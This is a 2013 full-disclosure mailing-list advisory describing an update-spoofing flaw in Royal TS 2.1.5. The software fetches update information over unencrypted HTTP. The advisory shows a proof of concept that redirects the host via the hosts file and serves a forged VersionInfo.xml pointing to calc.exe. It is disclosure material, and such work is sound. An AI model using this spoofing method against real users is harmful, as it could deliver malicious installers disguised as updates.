'[Full-disclosure] [waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] [waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2013-03-29 12:10:08
Message-ID: 1364559008.90536.YahooMailNeo () web125606 ! mail ! ne1 ! yahoo ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]



[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5
===============================================================================

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Royal TS is a simple, yet powerful tool for administrators, developers,
system engineers and many other IT focused information workers that supports
them in working effortless with their remote systems or management consoles.

http://www.royalts.com/main/home/win.aspx

Vulnerable is version 2.1.5, other versions not tested.


###############################################################################
1. Update Spoofing Vulnerability
###############################################################################

Current version of Royal TS contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, Royal TS issues GET request over HTTP:

GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" \
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  <Major>2</Major>
  <Minor>1</Minor>
  <Build>5</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL>
  <ReleaseNotes>
&lt;html lang=&quot;en&quot; xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;&lt; ...
  </ReleaseNotes>
</RoyalVersionInfo>



Royal TS user can click "Start Download" button and Royal TS
will open web browser with download starting dialog.

Such update mechanism contains security flaw:

Update check is done over unencrypted HTTP channel. Malicious third party
is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.
In this way it is possible to instruct user to download malicious update.


Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 www.royalts.com

2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory
with following content:

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" \
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  <Major>2</Major>
  <Minor>3</Minor>
  <Build>4</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://localhost/calc.exe</DownloadURL>
  <ReleaseNotes>
New version 2.3.4 available!
  </ReleaseNotes>
</RoyalVersionInfo>


3. Place "calc.exe" file to the webserver main directory.

4. Open Royal TS, it will check for updates automatically, resulting in dialog:

New version 2.3.4 available!


5. Press "Start Download" button. Default web browser window will be open
offering file download:

"You have chosen to open calc.exe"



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------


[Attachment #5 (text/html)]

<html><body><div style="color:#000; background-color:#fff; font-family:times new roman, new \
york, times, serif;font-size:12pt"><div><br>[waraxe-2013-SA#101] - Update Spoofing \
Vulnerability in Royal TS \
2.1.5<br>===============================================================================<br><br>Author: \
Janek Vind "waraxe"<br>Date: 29. March 2013<br>Location: Estonia, Tartu<br>Web: \
http://www.waraxe.us/advisory-101.html<br><br><br>Description of vulnerable \
software:<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>Royal \
TS is a simple, yet powerful tool for administrators, developers,<br>system engineers and many \
other IT focused information workers that supports<br>them in working effortless with their \
remote systems or management \
consoles.<br><br>http://www.royalts.com/main/home/win.aspx<br><br>Vulnerable is version 2.1.5, \
other versions not  tested.<br><br><br>###############################################################################<br>1. \
Update Spoofing Vulnerability<br>###############################################################################<br><br>Current \
version of Royal TS contains security vulnerability in update mechanism,<br>which can be \
exploited by malicious people to conduct spoofing attacks.<br><br>When checking for updates, \
Royal TS issues GET request over HTTP:<br><br>GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM \
HTTP/1.1<br>Cache-Control: no-cache<br>Host: www.royalts.com<br>Connection: \
Keep-Alive<br><br><br>Server response:<br><br>HTTP/1.1 200 OK<br>Content-Type: \
text/xml<br>Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT<br>Accept-Ranges: bytes<br>ETag: \
"d11e6057ebc3cd1:0"<br>Server: Microsoft-IIS/7.0<br>X-Powered-By: ASP.NET<br>Date: Thu, 28 Mar \
2013 19:54:39 GMT<br>Content-Length: 13375<br><br>&lt;?xml version="1.0" \
encoding="utf-8"?&gt;<br>&lt;RoyalVersionInfo  xmlns:xsd="http://www.w3.org/2001/XMLSchema" \
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&gt;<br>&nbsp; \
&lt;Major&gt;2&lt;/Major&gt;<br>&nbsp; &lt;Minor&gt;1&lt;/Minor&gt;<br>&nbsp; \
&lt;Build&gt;5&lt;/Build&gt;<br>&nbsp; \
&lt;MinorRevision&gt;61116&lt;/MinorRevision&gt;<br>&nbsp; \
&lt;DownloadURL&gt;http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi&lt;/DownloadURL&gt;<br>&nbsp; \
&lt;ReleaseNotes&gt;<br>&amp;lt;html lang=&amp;quot;en&amp;quot; \
xmlns=&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;&amp;gt;&amp;lt; ...<br>&nbsp; \
&lt;/ReleaseNotes&gt;<br>&lt;/RoyalVersionInfo&gt;<br><br><br><br>Royal TS user can click \
"Start Download" button and Royal TS<br>will open web browser with download starting \
dialog.<br><br>Such update mechanism contains security flaw:<br><br>Update check is done over \
unencrypted HTTP channel. Malicious third party<br>is able to conduct Man-in-the-Middle (MitM) \
attacks and spoof server response.<br>In this  way it is possible to instruct user to download \
malicious update.<br><br><br>Testing: tests were done using Windows 7 and Apache webserver. \
Steps:<br><br>1. modify "windows/system32/drivers/etc/hosts" file in order to emulate<br>DNS \
spoofing:&nbsp; 127.0.0.1 www.royalts.com<br><br>2. create xml file \
"/dl/RoyalTS/VersionInfo.xml" to the webserver directory<br>with following \
content:<br><br>&lt;?xml version="1.0" encoding="utf-8"?&gt;<br>&lt;RoyalVersionInfo \
xmlns:xsd="http://www.w3.org/2001/XMLSchema" \
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&gt;<br>&nbsp; \
&lt;Major&gt;2&lt;/Major&gt;<br>&nbsp; &lt;Minor&gt;3&lt;/Minor&gt;<br>&nbsp; \
&lt;Build&gt;4&lt;/Build&gt;<br>&nbsp; \
&lt;MinorRevision&gt;61116&lt;/MinorRevision&gt;<br>&nbsp; \
&lt;DownloadURL&gt;http://localhost/calc.exe&lt;/DownloadURL&gt;<br>&nbsp; \
&lt;ReleaseNotes&gt;<br>New version 2.3.4 available!<br>&nbsp; \
&lt;/ReleaseNotes&gt;<br>&lt;/RoyalVersionInfo&gt;<br><br><br>3. Place  "calc.exe" file to the \
webserver main directory.<br><br>4. Open Royal TS, it will check for updates automatically, \
resulting in dialog:<br><br>New version 2.3.4 available!<br><br><br>5. Press "Start Download" \
button. Default web browser window will be open<br>offering file download:<br><br>"You have \
chosen to open calc.exe"<br><br><br><br>Contact:<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>come2waraxe@yahoo.com<br>Janek \
Vind "waraxe"<br><br>Waraxe forum:&nbsp; http://www.waraxe.us/forums.html<br>Personal homepage: \
http://www.janekvind.com/<br>Random project: \
http://albumnow.com/<br>---------------------------------- [ EOF ] \
------------------------------------<br></div></div></body></html>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic